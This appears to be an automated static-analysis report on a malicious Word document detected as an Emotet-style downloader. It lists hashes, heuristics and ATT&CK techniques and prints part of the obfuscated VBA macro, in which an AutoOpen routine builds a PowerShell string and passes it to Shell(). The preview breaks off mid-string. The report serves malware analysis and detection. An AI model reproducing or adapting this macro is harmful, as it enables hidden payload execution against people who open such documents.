Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3258a9446ccd087d…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 239.0 KB
Created: 2018-06-29 13:46:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 2509c09342b087fda79b83457c298046
SHA-1: bfd105b82c2a151076097baf641e5e6a8c7de7fe
SHA-256: 3258a9446ccd087d99adfa9b585da8a53b9df71a04fcb6213fd202c462a71d4f
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1059 Command and Scripting Interpreter; T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro makes a Shell() call, indicating an attempt to execute a secondary payload. The ClamAV detection name 'Doc.Malware.Emodldr-6883773-0' further supports the malicious verdict. The VBA code is heavily obfuscated, but the combination of an AutoOpen entry point and a Shell() call strongly suggests downloader or dropper functionality.

Heuristics (7)

  • ClamAV: Doc.Malware.Emodldr-6883773-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-6883773-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11479 bytes
SHA-256: 9a95d8bd40fb66f33e28f2a740c7a0d0d9841885016d846dee11b0aceb2ba7eb
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "zEjRVNYjFqRs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IqTuzLGEJjJuh"
Function AjaMtlsCjw()
On Error Resume Next
QtGvYo = SzROX - amiuv / (sAQBjw + Oct(iuoiqX) - 61976 + Log(fNqtN))
ZLRadj = FLjGnM = 75807 / EsETL + 1609 / ChrW(61316) / JcotO + ChrW(TwsAQ) * 18511 + ChrB(42680 * CInt(fjhzns) * 157 - Hex(WsUZF)) + wbltu - Int(HzomXv) * (jOmwdr - MUlNM)
iUodFfwYQwY = dFNNrAur + Chr(FnlGvsiJvU + vbKeyP + vlAztowimH) + "owe" + "rs"
oTPbHf = OCZIBQ - fKjfp / (vVYfr + Oct(sGJjHR) - 50606 + Log(tbDuYC))
rZmwXZ = QYdZq = 76629 / nzrXz + 65488 / ChrW(12643) / iTbrr + ChrW(uYsBh) * 84197 + ChrB(1786 * CInt(dFLXcR) * 41656 - Hex(EzjLS)) + VStfbh - Int(SVjhFW) * (lYIwT - WmLcF)
nrNil = WmdBY - luSrDF / (utQAd + Oct(ljwBK) - 86653 + Log(SvpDL))
HzMPH = AhLDjn = 65235 / SujjTn + 69537 / ChrW(10131) / Srbda + ChrW(HoGmI) * 76253 + ChrB(46807 * CInt(QjHrY) * 96544 - Hex(aissaj)) + KFOiC - Int(uYjCZi) * (PaAZG - iTAMvL)
AjaMtlsCjw = tbIwGjYBCmG + iUodFfwYQwY + wchFsMEZj + UdJifOZIjBI + AQNqE
MEVOJI = CEYWnE - KKiomk / (iWTFXz + Oct(wuqiR) - 85224 + Log(OvIaW))
RZHRmZ = vVzQbw = 13217 / RNXqjP + 99214 / ChrW(38446) / lSHEL + ChrW(EOjFos) * 75063 + ChrB(54434 * CInt(bBYQjh) * 49078 - Hex(mqBhS)) + bhRFi - Int(TRXjiv) * (vqSki - tPhrin)
End Function
Sub AutoOpen()
On Error Resume Next
CGdqOV = aFjpF - PfiwC / (KwFoG + Oct(DOzzHX) - 56815 + Log(qFWkW))
wrSwz = ojFCDw = 5310 / hhCIm + 22204 / ChrW(25909) / JhnVL + ChrW(vOVOQb) * 65385 + ChrB(75221 * CInt(XIwIp) * 82910 - Hex(nlPimj)) + AnKvsh - Int(IcOMnq) * (ojabud - ApDXOS)
Application.Run "YjDWK", AjaMtlsCjw
rmzGz = iAEjDP - IwBIt / (KrThT + Oct(iwipj) - 21216 + Log(uEwwii))
VLObu = oKPUHG = 41937 / HwzRW + 97982 / ChrW(22138) / VdwIL + ChrW(cJJzad) * 58969 + ChrB(97402 * CInt(itUCsw) * 58814 - Hex(ABOHuI)) + NXNOp - Int(clawiG) * (JjskI - SXCwT)
End Sub
Function YjDWK(SOUdnjsFPT)
On Error Resume Next
lGXukY = GVwFKJ - dHoYDI / (cfJim + Oct(OvMPC) - 86782 + Log(KcdGX))
PAGGZd = TANRPJ = 85442 / RYFiz + 35939 / ChrW(69787) / KYYcVL + ChrW(AWdQo) * 19257 + ChrB(71419 * CInt(HpjKw) * 40092 - Hex(RBiln)) + tAhKiA - Int(iABHHq) * (vlsDw - LzoRHl)
GzKEBq = AOqbBP - mimIw / (BsuiM + Oct(bvRXMZ) - 30795 + Log(oTzfbJ))
GGZpmt = rhqzsE = 56834 / JaOPz + 33572 / ChrW(39559) / JhCQo + ChrW(BdhATB) * 2250 + ChrB(6069 * CInt(WlzPhF) * 23814 - Hex(wPzBB)) + qZSmv - Int(IjcAM) * (MSrlcW - jriAC)
JwwlzluSzof = RqRovUsb + Shell(nbEBREw + SOUdnjsFPT + aBTOm, 985845084 - 985845084) + YMBUdaLorMd
ojVDq = TTUsR - mWwid / (cASBD + Oct(wGhAYZ) - 81397 + Log(diIidt))
fwbQjN = TBFVE = 99392 / NCfrNP + 65196 / ChrW(67218) / iBlQRT + ChrW(HhmSVt) * 36688 + ChrB(26643 * CInt(aLcQRq) * 40992 - Hex(MaQSn)) + uBwHw - Int(wwzzQ) * (oRjQUj - OnEFS)
End Function

Function wchFsMEZj()
On Error Resume Next
kzHvMi = FmVZIa - BzaRC / (TOvGaO + Oct(flohUV) - 933 + Log(TXVDT))
jzljZ = MYXnq = 3266 / fMVjp + 38574 / ChrW(76684) / PVTSW + ChrW(bEBfuK) * 5016 + ChrB(35134 * CInt(siEEEi) * 34382 - Hex(XFosV)) + fGljq - Int(iRQCi) * (UWHwrK - kdwlP)
MwrnwiX = "hell" + "  " + Chr(40) + " '1" + "1d78T8" + "5,11" + "7<18d" + "65X7" + "4u88" + "X2m64u77" + "u69!74" + "T76m91!1"
SFpWRD = HTldw - zlInpn / (hnWIuK + Oct(SGqKpY) - 47059 + Log(vzWMI))
fhAhoQ = LmDjip = 30404 / CAUwE + 4929 / ChrW(39072) / oFmaFi + ChrW(ENiioj) * 91085 + ChrB(48860 * CInt(wfTwlA) * 74187 - Hex(kjRWBF)) + tLkMc - Int(psdLw) * (zKbpG - izYiVM)
oiikXQ = "5S97m74" + ",91<1m120" + "z74m77X" + "108m67S70" + "T74," + "65z91T20" + "X11S85u9" + "6d100" + ",18X8!" + "71d9"
JfZsI = pWXifM - AzfZb / (ikCDP + Oct(GawTlK) - 93575 + Log(cofvU))
LfYwtX = wqlsiZ = 12754 / jjbGHk + 2926 / ChrW(57100) / nYKnpI + ChrW(diqVH) * 95616 + ChrB(19874 * CInt(mSVPE) * 33843 - Hex(wRiMT)) + FALJBz - Int(VNqHh) * (PDikX - WaUpOl)
Kczzvikirw = "1<91S9" + "5,21m" + "0<0<88d" + "88T88" + "u1m76S93<" + "
... (truncated)